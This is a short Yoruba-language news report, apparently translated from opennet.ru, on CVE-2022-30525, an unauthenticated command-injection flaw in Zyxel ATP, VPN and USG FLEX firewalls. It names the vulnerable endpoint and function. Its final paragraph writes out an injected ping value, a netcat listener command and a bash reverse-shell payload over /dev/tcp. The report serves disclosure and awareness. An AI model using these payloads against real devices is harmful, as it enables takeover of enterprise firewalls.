Ailagbara pataki (CVE-2022-30525) ti ṣe idanimọ ni awọn ẹrọ Zyxel ti ATP, VPN ati USG FLEX jara, ti a ṣe lati ṣeto iṣẹ ti awọn ogiriina, IDS ati VPN ni awọn ile-iṣẹ, eyiti o fun laaye ikọlu ita lati ṣiṣẹ koodu lori ẹrọ lai olumulo awọn ẹtọ lai ìfàṣẹsí. Lati gbe ikọlu kan, ikọlu gbọdọ ni anfani lati fi awọn ibeere ranṣẹ si ẹrọ naa nipa lilo ilana HTTP/HTTPS. Zyxel ti ṣatunṣe ailagbara ninu imudojuiwọn famuwia ZLD 5.30. Gẹgẹbi iṣẹ Shodan, lọwọlọwọ awọn ohun elo 16213 ti o ni ipalara lori nẹtiwọọki agbaye ti o gba awọn ibeere nipasẹ HTTP/HTTPS.
A ṣe iṣẹ ṣiṣe nipasẹ fifiranṣẹ awọn aṣẹ ti a ṣe apẹrẹ pataki si olutọju wẹẹbu / ztp/cgi-bin/handler, wiwọle laisi ijẹrisi. Iṣoro naa jẹ idi nipasẹ aini isọdọmọ to dara ti awọn aye ibeere nigba ṣiṣe awọn aṣẹ lori eto nipa lilo ipe os.system ti a lo ninu ile-ikawe lib_wan_settings.py ati ṣiṣe nigba ṣiṣe iṣẹ ṣiṣe setWanPortSt.
Fun apẹẹrẹ, ikọlu le kọja okun naa “; ping 192.168.1.210; eyi ti yoo ja si ipaniyan ti pipaṣẹ "Ping 192.168.1.210" lori eto naa. Lati ni iraye si ikarahun aṣẹ, o le ṣiṣẹ “nc -lvnp 1270” lori ẹrọ rẹ, lẹhinna bẹrẹ asopọ yiyipada nipa fifiranṣẹ ibeere kan si ẹrọ pẹlu '; bash -c \» exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
orisun: opennet.ru